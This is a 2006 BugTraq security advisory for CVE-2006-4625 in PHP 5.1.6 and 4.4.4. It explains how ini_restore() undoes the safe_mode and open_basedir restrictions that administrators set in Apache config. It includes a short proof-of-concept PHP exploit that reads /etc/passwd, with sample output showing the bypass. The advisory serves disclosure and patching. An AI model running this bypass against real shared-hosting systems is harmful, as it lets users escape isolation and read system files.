BugTraq
PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore() Sep 09 2006 10:24AM
cxib securityreason com (1 replies)
-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1

[PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore()]

Author: Maksymilian Arciemowicz (cXIb8O3)

Date:

- - Written: 05.09.2006

- - Public: 09.09.2006

SecurityAlert Id: 42

CVE: CVE-2006-4625

SecurityRisk: High

Affected Software: PHP 5.1.6 / 4.4.4 < = x

Advisory URL: http://securityreason.com/achievement_securityalert/42

Vendor: http://www.php.net

- --- 0.Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific

features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much

of the PHP Conference Material is freely available.

php_admin_value name value

Sets the value of the specified directive. This can not be used in .htaccess files. Any directive type set with php_admin_value can

not be overridden by .htaccess or virtualhost directives. To clear a previously set value use none as the value.

php_admin_flag name on|off

Used to set a boolean configuration directive. This can not be used in .htaccess files. Any directive type set with php_admin_flag

can not be overridden by .htaccess or virtualhost directives.

http://pl.php.net/manual/en/configuration.changes.php

- --- 1. php_admin_value and php_admin_flag Bypass ---

When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g.

httpd.conf). This options are using by a lot of ISP to set open_basedir, safe_mode and more options.

For example:

open_basedir in httpd.conf

- ---

<Directory /usr/home/frajer/public_html/>

Options FollowSymLinks MultiViews Indexes

AllowOverride None

php_admin_flag safe_mode 1

php_admin_value open_basedir /usr/home/frajer/public_html/

</Directory>

- ---

In PHP are two config options. Are Local Value and Master Value. More in phpinfo() or ini_get()

Example:

If you have safe_mode or open_basedir (etc) set in Local Value for selected users and in Master Value is default value, you can restore

Master Value to Local Value per ini_restore() function!

- ---

ini_restore

(PHP 4, PHP 5)

ini_restore -- Restores the value of a configuration option

- ---

Restores the value of a php.ini file. Then your PHP options from httpd.conf are bypassed.

EXPLOIT:

- ---

<?

echo ini_get("safe_mode");

echo ini_get("open_basedir");

include("/etc/passwd");

ini_restore("safe_mode");

ini_restore("open_basedir");

echo ini_get("safe_mode");

echo ini_get("open_basedir");

include("/etc/passwd");

?>

- ---

RESULT OF EXPLOIT:

- ---

1

/usr/home/frajer/public_html/

Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s):

(/usr/home/frajer/public_html/) in /usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in

/usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include() [function.include]: Failed opening '/etc/passwd' for inclusion (include_path='.:') in

/usr/home/frajer/public_html/ini_restore.php on line 4

# $BSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-ag.....

- ---

This issue is very dangerous, because Admin can't correct set open_basedir or safe_mode for all users.

- --- 2. How to fix ---

fixed in CVS HEAD, PHP_5_2, PHP_5_1 and PHP_4_4.

http://cvs.php.net/viewcvs.cgi/php-src/NEWS

- --- 3. Greets ---

For: sp3x

and

p_e_a, l5x

- --- 4. Contact ---

Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]

Email: cxib [at] securityreason [dot] com

GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

Regards

SecurityReason

-----BEGIN PGP SIGNATURE-----

Version: GnuPG v1.4.2.2 (FreeBSD)

iD8DBQFFApZZ3Ke13X/fTO4RAmA4AJ9g4rA0hqST7Px7i03RGpE1bmZmrgCgmt0a

SvP3KPhmLtZcCNFmtGa8oJ8=

=bqQV

-----END PGP SIGNATURE-----

[ reply ]
Re: PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore() Sep 09 2006 04:48PM
İsmail Dönmez (ismail pardus org tr) (1 replies)
Re: PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore() Sep 13 2006 05:55AM
Ryan Buena (dreamsbig gmail com)


 

Privacy Statement
Copyright 2010, SecurityFocus